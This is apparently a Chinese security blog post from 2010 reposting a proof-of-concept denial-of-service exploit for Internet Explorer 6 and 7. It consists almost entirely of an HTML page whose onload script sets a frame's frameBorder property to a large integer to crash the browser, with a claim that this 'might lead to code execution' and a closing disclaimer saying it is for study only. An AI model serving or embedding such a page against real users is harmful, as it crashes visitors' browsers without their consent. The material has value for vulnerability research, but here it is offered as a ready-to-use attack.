IE6 / 7 Remote Dos vulnerability

date 2010年07月29日 | category 工具收集| 坏人咖啡

测试代码:

[html]
# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.

# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder
causing a dos and may lead to code execution.

#code

<html>
<head>
<script>

function dos(){

var e = document.createElement(‘frame’);
var prop = ‘frameBorder’;

e[prop] = 0123456789;
}

</script>
</head>
<body onload="dos()">
</body>

</html>

[/html]

本文只用于学习研究用,请勿用于其它用途。

所属分类: 工具收集
Tags: , , ,


没有评论

暂无评论

RSS feed for comments on this post.

对不起,该文章的评论被关闭了!